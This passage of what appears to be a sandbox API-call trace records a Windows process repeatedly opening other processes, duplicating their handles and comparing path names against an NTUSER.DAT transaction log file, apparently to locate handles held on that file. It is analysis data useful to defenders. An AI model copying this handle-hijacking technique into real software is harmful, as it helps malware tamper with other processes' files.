dwProcessId=0x944) returned 0x62c [0153.297] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.297] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.298] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.299] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.299] CloseHandle (hObject=0x670) returned 1 [0153.299] _wcsicmp (_Str1="\\Microsoft SQL Server Compact Edition", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0153.299] CloseHandle (hObject=0x680) returned 1 [0153.299] CloseHandle (hObject=0x62c) returned 1 [0153.299] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x954) returned 0x62c [0153.299] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.299] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.300] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.301] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.301] CloseHandle (hObject=0x670) returned 1 [0153.301] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.301] CloseHandle (hObject=0x680) returned 1 [0153.301] CloseHandle (hObject=0x62c) returned 1 [0153.301] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x954) returned 0x62c [0153.301] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.301] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.302] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.303] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.304] CloseHandle (hObject=0x670) returned 1 [0153.304] _wcsicmp (_Str1="\\MSBuild", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0153.304] CloseHandle (hObject=0x680) returned 1 [0153.304] CloseHandle (hObject=0x62c) returned 1 [0153.304] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x964) returned 0x62c [0153.304] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.304] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.305] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.305] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.305] CloseHandle (hObject=0x670) returned 1 [0153.305] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.305] CloseHandle (hObject=0x680) returned 1 [0153.306] CloseHandle (hObject=0x62c) returned 1 [0153.306] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x964) returned 0x62c [0153.306] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.306] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.306] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.307] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.307] CloseHandle (hObject=0x670) returned 1 [0153.307] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.307] CloseHandle (hObject=0x680) returned 1 [0153.307] CloseHandle (hObject=0x62c) returned 1 [0153.307] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x974) returned 0x62c [0153.307] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.307] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.308] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.308] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.309] CloseHandle (hObject=0x670) returned 1 [0153.309] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.309] CloseHandle (hObject=0x680) returned 1 [0153.309] CloseHandle (hObject=0x62c) returned 1 [0153.309] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x974) returned 0x62c [0153.309] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.309] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.309] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.310] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.310] CloseHandle (hObject=0x670) returned 1 [0153.310] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 7 [0153.310] CloseHandle (hObject=0x680) returned 1 [0153.310] CloseHandle (hObject=0x62c) returned 1 [0153.310] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x984) returned 0x62c [0153.310] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.310] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.311] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.312] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.312] CloseHandle (hObject=0x670) returned 1 [0153.312] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.312] CloseHandle (hObject=0x680) returned 1 [0153.312] CloseHandle (hObject=0x62c) returned 1 [0153.312] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x984) returned 0x62c [0153.312] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.312] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.312] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.313] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.313] CloseHandle (hObject=0x670) returned 1 [0153.313] _wcsicmp (_Str1="\\MSBuild", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0153.313] CloseHandle (hObject=0x680) returned 1 [0153.313] CloseHandle (hObject=0x62c) returned 1 [0153.313] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x994) returned 0x62c [0153.313] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.313] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.314] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.315] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.315] CloseHandle (hObject=0x670) returned 1 [0153.315] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.315] CloseHandle (hObject=0x680) returned 1 [0153.315] CloseHandle (hObject=0x62c) returned 1 [0153.316] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x994) returned 0x62c [0153.316] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.316] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.317] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.317] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.318] CloseHandle (hObject=0x670) returned 1 [0153.318] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.318] CloseHandle (hObject=0x680) returned 1 [0153.318] CloseHandle (hObject=0x62c) returned 1 [0153.318] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9a4) returned 0x62c [0153.318] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.318] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.319] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.319] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.319] CloseHandle (hObject=0x670) returned 1 [0153.319] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.319] CloseHandle (hObject=0x680) returned 1 [0153.319] CloseHandle (hObject=0x62c) returned 1 [0153.319] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9a4) returned 0x62c [0153.319] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.320] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.320] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.321] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.321] CloseHandle (hObject=0x670) returned 1 [0153.321] _wcsicmp (_Str1="\\Windows Sidebar", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.321] CloseHandle (hObject=0x680) returned 1 [0153.321] CloseHandle (hObject=0x62c) returned 1 [0153.321] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9a4) returned 0x62c [0153.321] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.321] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.322] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.322] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.322] CloseHandle (hObject=0x670) returned 1 [0153.322] _wcsicmp (_Str1="\\StaticCache.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0153.322] CloseHandle (hObject=0x680) returned 1 [0153.323] CloseHandle (hObject=0x62c) returned 1 [0153.323] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9b4) returned 0x62c [0153.323] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.323] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.323] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.324] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.324] CloseHandle (hObject=0x670) returned 1 [0153.324] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0153.324] CloseHandle (hObject=0x680) returned 1 [0153.324] CloseHandle (hObject=0x62c) returned 1 [0153.324] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9b4) returned 0x62c [0153.324] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.324] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.325] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.325] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.325] CloseHandle (hObject=0x670) returned 1 [0153.325] _wcsicmp (_Str1="\\Microsoft Office", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0153.326] CloseHandle (hObject=0x680) returned 1 [0153.326] CloseHandle (hObject=0x62c) returned 1 [0153.326] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9b4) returned 0x62c [0153.326] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x7c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.326] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.326] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.327] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.327] CloseHandle (hObject=0x670) returned 1 [0153.327] _wcsicmp (_Str1="\\StaticCache.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0153.327] CloseHandle (hObject=0x680) returned 1 [0153.327] CloseHandle (hObject=0x62c) returned 1 [0153.327] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e8) returned 0x62c [0153.327] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.327] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.328] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.328] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.329] CloseHandle (hObject=0x670) returned 1 [0153.329] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0153.329] CloseHandle (hObject=0x680) returned 1 [0153.329] CloseHandle (hObject=0x62c) returned 1 [0153.329] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e8) returned 0x62c [0153.329] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.329] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.329] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.330] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.330] CloseHandle (hObject=0x670) returned 1 [0153.330] CloseHandle (hObject=0x680) returned 1 [0153.330] CloseHandle (hObject=0x62c) returned 1 [0153.330] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e8) returned 0x62c [0153.330] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.330] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.331] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.332] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.332] CloseHandle (hObject=0x670) returned 1 [0153.332] CloseHandle (hObject=0x680) returned 1 [0153.332] CloseHandle (hObject=0x62c) returned 1 [0153.332] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e8) returned 0x62c [0153.332] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.332] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.333] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.334] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.334] CloseHandle (hObject=0x670) returned 1 [0153.334] CloseHandle (hObject=0x680) returned 1 [0153.334] CloseHandle (hObject=0x62c) returned 1 [0153.334] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa1c) returned 0x62c [0153.334] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.334] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.335] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.335] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.336] CloseHandle (hObject=0x670) returned 1 [0153.336] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0153.336] CloseHandle (hObject=0x680) returned 1 [0153.336] CloseHandle (hObject=0x62c) returned 1 [0153.336] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa1c) returned 0x62c [0153.336] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xa8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.336] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.337] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.337] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.337] CloseHandle (hObject=0x670) returned 1 [0153.337] CloseHandle (hObject=0x680) returned 1 [0153.337] CloseHandle (hObject=0x62c) returned 1 [0153.337] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa1c) returned 0x62c [0153.338] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.338] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.338] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.339] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.339] CloseHandle (hObject=0x670) returned 1 [0153.339] CloseHandle (hObject=0x680) returned 1 [0153.339] CloseHandle (hObject=0x62c) returned 1 [0153.339] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0153.339] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.339] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.340] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.340] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.340] CloseHandle (hObject=0x670) returned 1 [0153.340] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0153.340] CloseHandle (hObject=0x680) returned 1 [0153.340] CloseHandle (hObject=0x62c) returned 1 [0153.341] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0153.341] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.341] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.341] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.342] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.342] CloseHandle (hObject=0x670) returned 1 [0153.342] CloseHandle (hObject=0x680) returned 1 [0153.342] CloseHandle (hObject=0x62c) returned 1 [0153.342] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x440) returned 0x62c [0153.342] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x11c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.342] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.343] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 